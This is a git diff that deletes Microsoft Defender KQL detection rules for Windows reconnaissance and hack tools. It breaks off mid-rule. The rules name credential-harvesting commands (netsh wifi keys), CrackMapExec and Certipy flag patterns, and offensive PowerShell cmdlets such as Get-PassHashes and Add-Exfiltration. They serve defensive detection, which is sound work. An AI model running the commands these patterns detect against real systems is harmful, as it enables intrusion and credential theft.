-| where ((ProcessCommandLine contains " > " or ProcessCommandLine contains " | Select " or ProcessCommandLine contains "Out-File" or ProcessCommandLine contains "Set-Content" or ProcessCommandLine contains "Add-Content") and (ProcessCommandLine contains "Get-ADComputer " and ProcessCommandLine contains " -Filter *")) and ((FolderPath endswith "\\powershell.exe" or FolderPath endswith "\\pwsh.exe") or (ProcessVersionInfoOriginalFileName in~ ("PowerShell.EXE", "pwsh.dll"))) \ No newline at end of file diff --git a/Discovery/Computer_System_Reconnaissance_Via_Wmic.EXE.kql b/Discovery/Computer_System_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index 3aa4acf8..00000000 --- a/Discovery/Computer_System_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/09/08 -// Level: medium -// Description: Detects execution of wmic utility with the "computersystem" flag in order to obtain information about the machine such as the domain, username, model, etc. -// Tags: attack.discovery, attack.execution, attack.t1047 -DeviceProcessEvents -| where ProcessCommandLine contains "computersystem" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Discovery/Console_CodePage_Lookup_Via_CHCP.kql b/Discovery/Console_CodePage_Lookup_Via_CHCP.kql deleted file mode 100644 index 7179f355..00000000 --- a/Discovery/Console_CodePage_Lookup_Via_CHCP.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: _pete_0, TheDFIRReport -// Date: 2022/02/21 -// Level: medium -// Description: Detects use of chcp to look up the system locale value as part of host discovery -// Tags: attack.discovery, attack.t1614.001 -DeviceProcessEvents -| where (ProcessCommandLine endswith "chcp" or ProcessCommandLine endswith "chcp " or ProcessCommandLine endswith "chcp ") and FolderPath endswith "\\chcp.com" and (InitiatingProcessCommandLine contains " -c " or InitiatingProcessCommandLine contains " /c " or InitiatingProcessCommandLine contains " -r " or InitiatingProcessCommandLine contains " /r " or InitiatingProcessCommandLine contains " -k " or InitiatingProcessCommandLine contains " /k ") and InitiatingProcessFolderPath endswith "\\cmd.exe" \ No newline at end of file diff --git a/Discovery/Detected_Windows_Software_Discovery.kql b/Discovery/Detected_Windows_Software_Discovery.kql deleted file mode 100644 index 76f1939d..00000000 --- a/Discovery/Detected_Windows_Software_Discovery.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nikita Nazarov, oscd.community -// Date: 2020/10/16 -// Level: medium -// Description: Adversaries may attempt to enumerate software for a variety of reasons, such as figuring out what security measures are present or if the compromised system has a version of software that is vulnerable. -// Tags: attack.discovery, attack.t1518 -DeviceProcessEvents -| where (ProcessCommandLine contains "query" and ProcessCommandLine contains "\\software\\" and ProcessCommandLine contains "/v" and ProcessCommandLine contains "svcversion") and FolderPath endswith "\\reg.exe" \ No newline at end of file diff --git a/Discovery/DirLister_Execution.kql b/Discovery/DirLister_Execution.kql deleted file mode 100644 index d5da06cb..00000000 --- a/Discovery/DirLister_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/08/20 -// Level: low -// Description: Detect the usage of "DirLister.exe" a utility for quickly listing folder or drive contents. It was seen used by BlackCat ransomware to create a list of accessible directories and files. -// Tags: attack.discovery, attack.t1083 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "DirLister.exe" or FolderPath endswith "\\dirlister.exe" \ No newline at end of file diff --git a/Discovery/Discovery_of_a_System_Time.kql b/Discovery/Discovery_of_a_System_Time.kql deleted file mode 100644 index c46edd34..00000000 --- a/Discovery/Discovery_of_a_System_Time.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: E.M. Anhaus (originally from Atomic Blue Detections, Endgame), oscd.community -// Date: 2019/10/24 -// Level: low -// Description: Identifies use of various commands to query a systems time. This technique may be used before executing a scheduled task or to discover the time zone of a target system. -// Tags: attack.discovery, attack.t1124 -DeviceProcessEvents -| where (ProcessCommandLine contains "time" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) or (ProcessCommandLine contains "tz" and FolderPath endswith "\\w32tm.exe") \ No newline at end of file diff --git a/Discovery/Domain_Trust_Discovery_Via_Dsquery.kql b/Discovery/Domain_Trust_Discovery_Via_Dsquery.kql deleted file mode 100644 index b4f3e67d..00000000 --- a/Discovery/Domain_Trust_Discovery_Via_Dsquery.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: E.M. Anhaus, Tony Lambert, oscd.community, omkar72 -// Date: 2019/10/24 -// Level: medium -// Description: Detects execution of "dsquery.exe" for domain trust discovery -// Tags: attack.discovery, attack.t1482 -DeviceProcessEvents -| where ProcessCommandLine contains "trustedDomain" and (FolderPath endswith "\\dsquery.exe" or ProcessVersionInfoOriginalFileName =~ "dsquery.exe") \ No newline at end of file diff --git a/Discovery/DriverQuery.EXE_Execution.kql b/Discovery/DriverQuery.EXE_Execution.kql deleted file mode 100644 index 3320ae10..00000000 --- a/Discovery/DriverQuery.EXE_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/19 -// Level: medium -// Description: Detect usage of the "driverquery" utility. Which can be used to perform reconnaissance on installed drivers -// Tags: attack.discovery -DeviceProcessEvents -| where (FolderPath endswith "driverquery.exe" or ProcessVersionInfoOriginalFileName =~ "drvqry.exe") and (not(((InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\rundll32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe") or (InitiatingProcessFolderPath contains "\\AppData\\Local\\" or InitiatingProcessFolderPath contains "\\Users\\Public\\" or InitiatingProcessFolderPath contains "\\Windows\\Temp\\")))) \ No newline at end of file diff --git a/Discovery/Enumerate_All_Information_With_Whoami.EXE.kql b/Discovery/Enumerate_All_Information_With_Whoami.EXE.kql deleted file mode 100644 index f77ae57d..00000000 --- a/Discovery/Enumerate_All_Information_With_Whoami.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/12/04 -// Level: medium -// Description: Detects the execution of "whoami.exe" with the "/all" flag -// Tags: attack.discovery, attack.t1033, car.2016-03-001 -DeviceProcessEvents -| where (ProcessCommandLine contains " -all" or ProcessCommandLine contains " /all") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") \ No newline at end of file diff --git a/Discovery/File_And_SubFolder_Enumeration_Via_Dir_Command.kql b/Discovery/File_And_SubFolder_Enumeration_Via_Dir_Command.kql deleted file mode 100644 index 18888bf8..00000000 --- a/Discovery/File_And_SubFolder_Enumeration_Via_Dir_Command.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: frack113 -// Date: 2021/12/13 -// Level: low -// Description: Detects usage of the "dir" command part of Widows CMD with the "/S" command line flag in order to enumerate files in a specified directory and all subdirectories. - -// Tags: attack.discovery, attack.t1217 -DeviceProcessEvents -| where (ProcessCommandLine =~ "*dir*-s*" or ProcessCommandLine =~ "*dir*/s*") and (FolderPath endswith "\\cmd.exe" or ProcessVersionInfoOriginalFileName =~ "Cmd.Exe") \ No newline at end of file diff --git a/Discovery/Firewall_Configuration_Discovery_Via_Netsh.EXE.kql b/Discovery/Firewall_Configuration_Discovery_Via_Netsh.EXE.kql deleted file mode 100644 index 01471760..00000000 --- a/Discovery/Firewall_Configuration_Discovery_Via_Netsh.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113, Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' -// Date: 2021/12/07 -// Level: low -// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems -// Tags: attack.discovery, attack.t1016 -DeviceProcessEvents -| where ((ProcessCommandLine contains "config " or ProcessCommandLine contains "state " or ProcessCommandLine contains "rule " or ProcessCommandLine contains "name=all") and (ProcessCommandLine contains "netsh " and ProcessCommandLine contains "show " and ProcessCommandLine contains "firewall ")) and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/Discovery/Fsutil_Drive_Enumeration.kql b/Discovery/Fsutil_Drive_Enumeration.kql deleted file mode 100644 index 32735e4a..00000000 --- a/Discovery/Fsutil_Drive_Enumeration.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Christopher Peacock '@securepeacock', SCYTHE '@scythe_io' -// Date: 2022/03/29 -// Level: low -// Description: Attackers may leverage fsutil to enumerated connected drives. -// Tags: attack.discovery, attack.t1120 -DeviceProcessEvents -| where ProcessCommandLine contains "drives" and (FolderPath endswith "\\fsutil.exe" or ProcessVersionInfoOriginalFileName =~ "fsutil.exe") \ No newline at end of file diff --git a/Discovery/GatherNetworkInfo.VBS_Reconnaissance_Script_Output.kql b/Discovery/GatherNetworkInfo.VBS_Reconnaissance_Script_Output.kql deleted file mode 100644 index d9c727d8..00000000 --- a/Discovery/GatherNetworkInfo.VBS_Reconnaissance_Script_Output.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/08 -// Level: medium -// Description: Detects creation of files which are the results of executing the built-in reconnaissance script "C:\Windows\System32\gatherNetworkInfo.vbs". -// Tags: attack.discovery -DeviceFileEvents -| where (FolderPath endswith "\\Hotfixinfo.txt" or FolderPath endswith "\\netiostate.txt" or FolderPath endswith "\\sysportslog.txt" or FolderPath endswith "\\VmSwitchLog.evtx") and FolderPath startswith "C:\\Windows\\System32\\config" \ No newline at end of file diff --git a/Discovery/Gpresult_Display_Group_Policy_Information.kql b/Discovery/Gpresult_Display_Group_Policy_Information.kql deleted file mode 100644 index b1461815..00000000 --- a/Discovery/Gpresult_Display_Group_Policy_Information.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/05/01 -// Level: medium -// Description: Detects cases in which a user uses the built-in Windows utility gpresult to display the Resultant Set of Policy (RSoP) information -// Tags: attack.discovery, attack.t1615 -DeviceProcessEvents -| where (ProcessCommandLine contains "/z" or ProcessCommandLine contains "/v") and FolderPath endswith "\\gpresult.exe" \ No newline at end of file diff --git a/Discovery/Group_Membership_Reconnaissance_Via_Whoami.EXE.kql b/Discovery/Group_Membership_Reconnaissance_Via_Whoami.EXE.kql deleted file mode 100644 index 07d24c69..00000000 --- a/Discovery/Group_Membership_Reconnaissance_Via_Whoami.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/02/28 -// Level: medium -// Description: Detects the execution of whoami.exe with the /group command line flag to show group membership for the current user, account type, security identifiers (SID), and attributes. -// Tags: attack.discovery, attack.t1033 -DeviceProcessEvents -| where (ProcessCommandLine contains " /groups" or ProcessCommandLine contains " -groups") and (FolderPath endswith "\\whoami.exe" or ProcessVersionInfoOriginalFileName =~ "whoami.exe") \ No newline at end of file diff --git a/Discovery/HackTool_-_Certify_Execution.kql b/Discovery/HackTool_-_Certify_Execution.kql deleted file mode 100644 index 1f56d25c..00000000 --- a/Discovery/HackTool_-_Certify_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems) -// Date: 2023/04/17 -// Level: high -// Description: Detects Certify a tool for Active Directory certificate abuse based on PE metadata characteristics and common command line arguments. -// Tags: attack.discovery, attack.credential_access, attack.t1649 -DeviceProcessEvents -| where (FolderPath endswith "\\Certify.exe" or ProcessVersionInfoOriginalFileName =~ "Certify.exe" or ProcessVersionInfoFileDescription contains "Certify") or ((ProcessCommandLine contains ".exe cas " or ProcessCommandLine contains ".exe find " or ProcessCommandLine contains ".exe pkiobjects " or ProcessCommandLine contains ".exe request " or ProcessCommandLine contains ".exe download ") and (ProcessCommandLine contains " /vulnerable" or ProcessCommandLine contains " /template:" or ProcessCommandLine contains " /altname:" or ProcessCommandLine contains " /domain:" or ProcessCommandLine contains " /path:" or ProcessCommandLine contains " /ca:")) \ No newline at end of file diff --git a/Discovery/HackTool_-_Certipy_Execution.kql b/Discovery/HackTool_-_Certipy_Execution.kql deleted file mode 100644 index 39f45158..00000000 --- a/Discovery/HackTool_-_Certipy_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: pH-T (Nextron Systems) -// Date: 2023/04/17 -// Level: high -// Description: Detects Certipy a tool for Active Directory Certificate Services enumeration and abuse based on PE metadata characteristics and common command line arguments. -// Tags: attack.discovery, attack.credential_access, attack.t1649 -DeviceProcessEvents -| where (FolderPath endswith "\\Certipy.exe" or ProcessVersionInfoOriginalFileName =~ "Certipy.exe" or ProcessVersionInfoFileDescription contains "Certipy") or ((ProcessCommandLine contains " auth " or ProcessCommandLine contains " find " or ProcessCommandLine contains " forge " or ProcessCommandLine contains " relay " or ProcessCommandLine contains " req " or ProcessCommandLine contains " shadow ") and (ProcessCommandLine contains " -bloodhound" or ProcessCommandLine contains " -ca-pfx " or ProcessCommandLine contains " -dc-ip " or ProcessCommandLine contains " -kirbi" or ProcessCommandLine contains " -old-bloodhound" or ProcessCommandLine contains " -pfx " or ProcessCommandLine contains " -target" or ProcessCommandLine contains " -username " or ProcessCommandLine contains " -vulnerable" or ProcessCommandLine contains "auth -pfx" or ProcessCommandLine contains "shadow auto" or ProcessCommandLine contains "shadow list")) \ No newline at end of file diff --git a/Discovery/HackTool_-_CrackMapExec_Execution.kql b/Discovery/HackTool_-_CrackMapExec_Execution.kql deleted file mode 100644 index 2272759d..00000000 --- a/Discovery/HackTool_-_CrackMapExec_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/02/25 -// Level: high -// Description: This rule detect common flag combinations used by CrackMapExec in order to detect its use even if the binary has been replaced. -// Tags: attack.execution, attack.persistence, attack.privilege_escalation, attack.credential_access, attack.discovery, attack.t1047, attack.t1053, attack.t1059.003, attack.t1059.001, attack.t1110, attack.t1201 -DeviceProcessEvents -| where (FolderPath endswith "\\crackmapexec.exe" or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -x ") or (ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -H 'NTHASH'") or (ProcessCommandLine contains " mssql " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -d ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -H " and ProcessCommandLine contains " -M " and ProcessCommandLine contains " -o ") or (ProcessCommandLine contains " smb " and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p " and ProcessCommandLine contains " --local-auth") or ProcessCommandLine contains " -M pe_inject ") or ((ProcessCommandLine contains " --local-auth" and ProcessCommandLine contains " -u " and ProcessCommandLine contains " -p ") and (ProcessCommandLine contains " 10." and ProcessCommandLine contains " 192.168." and ProcessCommandLine contains "/24 ")) \ No newline at end of file diff --git a/Discovery/HackTool_-_SharpLDAPmonitor_Execution.kql b/Discovery/HackTool_-_SharpLDAPmonitor_Execution.kql deleted file mode 100644 index 0bdef452..00000000 --- a/Discovery/HackTool_-_SharpLDAPmonitor_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2022/12/30 -// Level: medium -// Description: Detects execution of the SharpLDAPmonitor. Which can monitor the creation, deletion and changes to LDAP objects. -// Tags: attack.discovery -DeviceProcessEvents -| where (ProcessCommandLine contains "/user:" and ProcessCommandLine contains "/pass:" and ProcessCommandLine contains "/dcip:") or (FolderPath endswith "\\SharpLDAPmonitor.exe" or ProcessVersionInfoOriginalFileName =~ "SharpLDAPmonitor.exe") \ No newline at end of file diff --git a/Discovery/HackTool_-_SharpLdapWhoami_Execution.kql b/Discovery/HackTool_-_SharpLdapWhoami_Execution.kql deleted file mode 100644 index e3ed1e0a..00000000 --- a/Discovery/HackTool_-_SharpLdapWhoami_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Florian Roth (Nextron Systems) -// Date: 2022/08/29 -// Level: high -// Description: Detects SharpLdapWhoami, a whoami alternative that queries the LDAP service on a domain controller -// Tags: attack.discovery, attack.t1033, car.2016-03-001 -DeviceProcessEvents -| where (ProcessCommandLine endswith " /method:ntlm" or ProcessCommandLine endswith " /method:kerb" or ProcessCommandLine endswith " /method:nego" or ProcessCommandLine endswith " /m:nego" or ProcessCommandLine endswith " /m:ntlm" or ProcessCommandLine endswith " /m:kerb") or FolderPath endswith "\\SharpLdapWhoami.exe" or (ProcessVersionInfoOriginalFileName contains "SharpLdapWhoami" or ProcessVersionInfoProductName =~ "SharpLdapWhoami") \ No newline at end of file diff --git a/Discovery/HackTool_-_SharpView_Execution.kql b/Discovery/HackTool_-_SharpView_Execution.kql deleted file mode 100644 index 4af5cead..00000000 --- a/Discovery/HackTool_-_SharpView_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2021/12/10 -// Level: high -// Description: Adversaries may look for details about the network configuration and settings of systems they access or through information discovery of remote systems -// Tags: attack.discovery, attack.t1049, attack.t1069.002, attack.t1482, attack.t1135, attack.t1033 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "SharpView.exe" or FolderPath endswith "\\SharpView.exe" or (ProcessCommandLine contains "Add-RemoteConnection" or ProcessCommandLine contains "Convert-ADName" or ProcessCommandLine contains "ConvertFrom-SID" or ProcessCommandLine contains "ConvertFrom-UACValue" or ProcessCommandLine contains "Convert-SidToName" or ProcessCommandLine contains "Export-PowerViewCSV" or ProcessCommandLine contains "Find-DomainObjectPropertyOutlier" or ProcessCommandLine contains "Find-DomainProcess" or ProcessCommandLine contains "Find-DomainShare" or ProcessCommandLine contains "Find-DomainUserEvent" or ProcessCommandLine contains "Find-DomainUserLocation" or ProcessCommandLine contains "Find-ForeignGroup" or ProcessCommandLine contains "Find-ForeignUser" or ProcessCommandLine contains "Find-GPOComputerAdmin" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-Interesting" or ProcessCommandLine contains "Find-LocalAdminAccess" or ProcessCommandLine contains "Find-ManagedSecurityGroups" or ProcessCommandLine contains "Get-CachedRDPConnection" or ProcessCommandLine contains "Get-DFSshare" or ProcessCommandLine contains "Get-DomainComputer" or ProcessCommandLine contains "Get-DomainController" or ProcessCommandLine contains "Get-DomainDFSShare" or ProcessCommandLine contains "Get-DomainDNSRecord" or ProcessCommandLine contains "Get-DomainFileServer" or ProcessCommandLine contains "Get-DomainForeign" or ProcessCommandLine contains "Get-DomainGPO" or ProcessCommandLine contains "Get-DomainGroup" or ProcessCommandLine contains "Get-DomainGUIDMap" or ProcessCommandLine contains "Get-DomainManagedSecurityGroup" or ProcessCommandLine contains "Get-DomainObject" or ProcessCommandLine contains "Get-DomainOU" or ProcessCommandLine contains "Get-DomainPolicy" or ProcessCommandLine contains "Get-DomainSID" or ProcessCommandLine contains "Get-DomainSite" or ProcessCommandLine contains "Get-DomainSPNTicket" or ProcessCommandLine contains "Get-DomainSubnet" or ProcessCommandLine contains "Get-DomainTrust" or ProcessCommandLine contains "Get-DomainUserEvent" or ProcessCommandLine contains "Get-ForestDomain" or ProcessCommandLine contains "Get-ForestGlobalCatalog" or ProcessCommandLine contains "Get-ForestTrust" or ProcessCommandLine contains "Get-GptTmpl" or ProcessCommandLine contains "Get-GroupsXML" or ProcessCommandLine contains "Get-LastLoggedOn" or ProcessCommandLine contains "Get-LoggedOnLocal" or ProcessCommandLine contains "Get-NetComputer" or ProcessCommandLine contains "Get-NetDomain" or ProcessCommandLine contains "Get-NetFileServer" or ProcessCommandLine contains "Get-NetForest" or ProcessCommandLine contains "Get-NetGPO" or ProcessCommandLine contains "Get-NetGroupMember" or ProcessCommandLine contains "Get-NetLocalGroup" or ProcessCommandLine contains "Get-NetLoggedon" or ProcessCommandLine contains "Get-NetOU" or ProcessCommandLine contains "Get-NetProcess" or ProcessCommandLine contains "Get-NetRDPSession" or ProcessCommandLine contains "Get-NetSession" or ProcessCommandLine contains "Get-NetShare" or ProcessCommandLine contains "Get-NetSite" or ProcessCommandLine contains "Get-NetSubnet" or ProcessCommandLine contains "Get-NetUser" or ProcessCommandLine contains "Get-PathAcl" or ProcessCommandLine contains "Get-PrincipalContext" or ProcessCommandLine contains "Get-RegistryMountedDrive" or ProcessCommandLine contains "Get-RegLoggedOn" or ProcessCommandLine contains "Get-WMIRegCachedRDPConnection" or ProcessCommandLine contains "Get-WMIRegLastLoggedOn" or ProcessCommandLine contains "Get-WMIRegMountedDrive" or ProcessCommandLine contains "Get-WMIRegProxy" or ProcessCommandLine contains "Invoke-ACLScanner" or ProcessCommandLine contains "Invoke-CheckLocalAdminAccess" or ProcessCommandLine contains "Invoke-Kerberoast" or ProcessCommandLine contains "Invoke-MapDomainTrust" or ProcessCommandLine contains "Invoke-RevertToSelf" or ProcessCommandLine contains "Invoke-Sharefinder" or ProcessCommandLine contains "Invoke-UserImpersonation" or ProcessCommandLine contains "Remove-DomainObjectAcl" or ProcessCommandLine contains "Remove-RemoteConnection" or ProcessCommandLine contains "Request-SPNTicket" or ProcessCommandLine contains "Set-DomainObject" or ProcessCommandLine contains "Test-AdminAccess") \ No newline at end of file diff --git a/Discovery/HackTool_-_TruffleSnout_Execution.kql b/Discovery/HackTool_-_TruffleSnout_Execution.kql deleted file mode 100644 index 332dd084..00000000 --- a/Discovery/HackTool_-_TruffleSnout_Execution.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: frack113 -// Date: 2022/08/20 -// Level: high -// Description: Detects the use of TruffleSnout.exe an iterative AD discovery toolkit for offensive operators, situational awareness and targeted low noise enumeration. -// Tags: attack.discovery, attack.t1482 -DeviceProcessEvents -| where ProcessVersionInfoOriginalFileName =~ "TruffleSnout.exe" or FolderPath endswith "\\TruffleSnout.exe" \ No newline at end of file diff --git a/Discovery/HackTool_-_WinPwn_Execution.kql b/Discovery/HackTool_-_WinPwn_Execution.kql deleted file mode 100644 index bd621578..00000000 --- a/Discovery/HackTool_-_WinPwn_Execution.kql +++ /dev/null @@ -1,8 +0,0 @@ -// Author: Swachchhanda Shrawan Poudel -// Date: 2023/12/04 -// Level: high -// Description: Detects commandline keywords indicative of potential usge of the tool WinPwn. A tool for Windows and Active Directory reconnaissance and exploitation. - -// Tags: attack.credential_access, attack.defense_evasion, attack.discovery, attack.execution, attack.privilege_escalation, attack.t1046, attack.t1082, attack.t1106, attack.t1518, attack.t1548.002, attack.t1552.001, attack.t1555, attack.t1555.003 -DeviceProcessEvents -| where ProcessCommandLine contains "Offline_Winpwn" or ProcessCommandLine contains "WinPwn " or ProcessCommandLine contains "WinPwn.exe" or ProcessCommandLine contains "WinPwn.ps1" \ No newline at end of file diff --git a/Discovery/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql b/Discovery/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql deleted file mode 100644 index 7d6acba4..00000000 --- a/Discovery/Harvesting_Of_Wifi_Credentials_Via_Netsh.EXE.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Andreas Hunkeler (@Karneades), oscd.community -// Date: 2020/04/20 -// Level: medium -// Description: Detect the harvesting of wifi credentials using netsh.exe -// Tags: attack.discovery, attack.credential_access, attack.t1040 -DeviceProcessEvents -| where (ProcessCommandLine contains "wlan" and ProcessCommandLine contains " s" and ProcessCommandLine contains " p" and ProcessCommandLine contains " k" and ProcessCommandLine contains "=clear") and (FolderPath endswith "\\netsh.exe" or ProcessVersionInfoOriginalFileName =~ "netsh.exe") \ No newline at end of file diff --git a/Discovery/Local_Accounts_Discovery.kql b/Discovery/Local_Accounts_Discovery.kql deleted file mode 100644 index c0632ae6..00000000 --- a/Discovery/Local_Accounts_Discovery.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community -// Date: 2019/10/21 -// Level: low -// Description: Local accounts, System Owner/User discovery using operating systems utilities -// Tags: attack.discovery, attack.t1033, attack.t1087.001 -DeviceProcessEvents -| where (((ProcessCommandLine contains " /c" and ProcessCommandLine contains "dir " and ProcessCommandLine contains "\\Users\\") and FolderPath endswith "\\cmd.exe") and (not(ProcessCommandLine contains " rmdir "))) or ((ProcessCommandLine contains "user" and (FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe")) and (not((ProcessCommandLine contains "/domain" or ProcessCommandLine contains "/add" or ProcessCommandLine contains "/delete" or ProcessCommandLine contains "/active" or ProcessCommandLine contains "/expires" or ProcessCommandLine contains "/passwordreq" or ProcessCommandLine contains "/scriptpath" or ProcessCommandLine contains "/times" or ProcessCommandLine contains "/workstations")))) or ((ProcessCommandLine contains " /l" and FolderPath endswith "\\cmdkey.exe") or (FolderPath endswith "\\whoami.exe" or FolderPath endswith "\\quser.exe" or FolderPath endswith "\\qwinsta.exe") or ((ProcessCommandLine contains "useraccount" and ProcessCommandLine contains "get") and FolderPath endswith "\\wmic.exe")) \ No newline at end of file diff --git a/Discovery/Local_Groups_Reconnaissance_Via_Wmic.EXE.kql b/Discovery/Local_Groups_Reconnaissance_Via_Wmic.EXE.kql deleted file mode 100644 index a64283b9..00000000 --- a/Discovery/Local_Groups_Reconnaissance_Via_Wmic.EXE.kql +++ /dev/null @@ -1,11 +0,0 @@ -// Author: frack113 -// Date: 2021/12/12 -// Level: low -// Description: Detects the execution of "wmic" with the "group" flag. -Adversaries may attempt to find local system groups and permission settings. -The knowledge of local system permission groups can help adversaries determine which groups exist and which users belong to a particular group. -Adversaries may use this information to determine which users have elevated permissions, such as the users found within the local administrators group. - -// Tags: attack.discovery, attack.t1069.001 -DeviceProcessEvents -| where ProcessCommandLine contains " group" and (FolderPath endswith "\\wmic.exe" or ProcessVersionInfoOriginalFileName =~ "wmic.exe") \ No newline at end of file diff --git a/Discovery/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql b/Discovery/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql deleted file mode 100644 index dd255075..00000000 --- a/Discovery/Malicious_PowerShell_Commandlets_-_ProcessCreation.kql +++ /dev/null @@ -1,7 +0,0 @@ -// Author: Nasreddine Bencherchali (Nextron Systems) -// Date: 2023/01/02 -// Level: high -// Description: Detects Commandlet names from well-known PowerShell exploitation frameworks -// Tags: attack.execution, attack.discovery, attack.t1482, attack.t1087, attack.t1087.001, attack.t1087.002, attack.t1069.001, attack.t1069.002, attack.t1069, attack.t1059.001 -DeviceProcessEvents -| where ProcessCommandLine contains "Add-Exfiltration" or ProcessCommandLine contains "Add-Persistence" or ProcessCommandLine contains "Add-RegBackdoor" or ProcessCommandLine contains "Add-RemoteRegBackdoor" or ProcessCommandLine contains "Add-ScrnSaveBackdoor" or ProcessCommandLine contains "Check-VM" or ProcessCommandLine contains "ConvertTo-Rc4ByteStream" or ProcessCommandLine contains "Decrypt-Hash" or ProcessCommandLine contains "Disable-ADIDNSNode" or ProcessCommandLine contains "Disable-MachineAccount" or ProcessCommandLine contains "Do-Exfiltration" or ProcessCommandLine contains "Enable-ADIDNSNode" or ProcessCommandLine contains "Enable-MachineAccount" or ProcessCommandLine contains "Enabled-DuplicateToken" or ProcessCommandLine contains "Exploit-Jboss" or ProcessCommandLine contains "Export-ADR" or ProcessCommandLine contains "Export-ADRCSV" or ProcessCommandLine contains "Export-ADRExcel" or ProcessCommandLine contains "Export-ADRHTML" or ProcessCommandLine contains "Export-ADRJSON" or ProcessCommandLine contains "Export-ADRXML" or ProcessCommandLine contains "Find-Fruit" or ProcessCommandLine contains "Find-GPOLocation" or ProcessCommandLine contains "Find-TrustedDocuments" or ProcessCommandLine contains "Get-ADIDNS" or ProcessCommandLine contains "Get-ApplicationHost" or ProcessCommandLine contains "Get-ChromeDump" or ProcessCommandLine contains "Get-ClipboardContents" or ProcessCommandLine contains "Get-FoxDump" or ProcessCommandLine contains "Get-GPPPassword" or ProcessCommandLine contains "Get-IndexedItem" or ProcessCommandLine contains "Get-KerberosAESKey" or ProcessCommandLine contains "Get-Keystrokes" or ProcessCommandLine contains "Get-LSASecret" or ProcessCommandLine contains "Get-MachineAccountAttribute" or ProcessCommandLine contains "Get-MachineAccountCreator" or ProcessCommandLine contains "Get-PassHashes" or ProcessCommandLine contains "Get-RegAlwaysInstallElevated" or ProcessCommandLine contains "Get-RegAutoLogon" or ProcessCommandLine contains "Get-RemoteBootKey" or ProcessCommandLine contains "Get-RemoteCachedCredential" or ProcessCommandLine contains "Get-RemoteLocalAccountHash" or ProcessCommandLine contains "Get-RemoteLSAKey" or ProcessCommandLine contains "Get-RemoteMachineAccountHash" or ProcessCommandLine contains "Get-RemoteNLKMKey" or ProcessCommandLine contains "Get-RickAstley" or ProcessCommandLine contains "Get-Screenshot" or ProcessCommandLine contains "Get-SecurityPackages" or ProcessCommandLine contains "Get-ServiceFilePermission" or ProcessCommandLine contains "Get-ServicePermission" or ProcessCommandLine contains "Get-ServiceUnquoted" or ProcessCommandLine contains "Get-SiteListPassword" or ProcessCommandLine contains "Get-System" or ProcessCommandLine contains "Get-TimedScreenshot" or ProcessCommandLine contains "Get-UnattendedInstallFile" or ProcessCommandLine contains "Get-Unconstrained" or ProcessCommandLine contains "Get-USBKeystrokes" or ProcessCommandLine contains "Get-VaultCredential" or ProcessCommandLine contains "Get-VulnAutoRun" or ProcessCommandLine contains "Get-VulnSchTask" or ProcessCommandLine contains "Grant-ADIDNSPermission" or ProcessCommandLine contains "Gupt-Backdoor" or 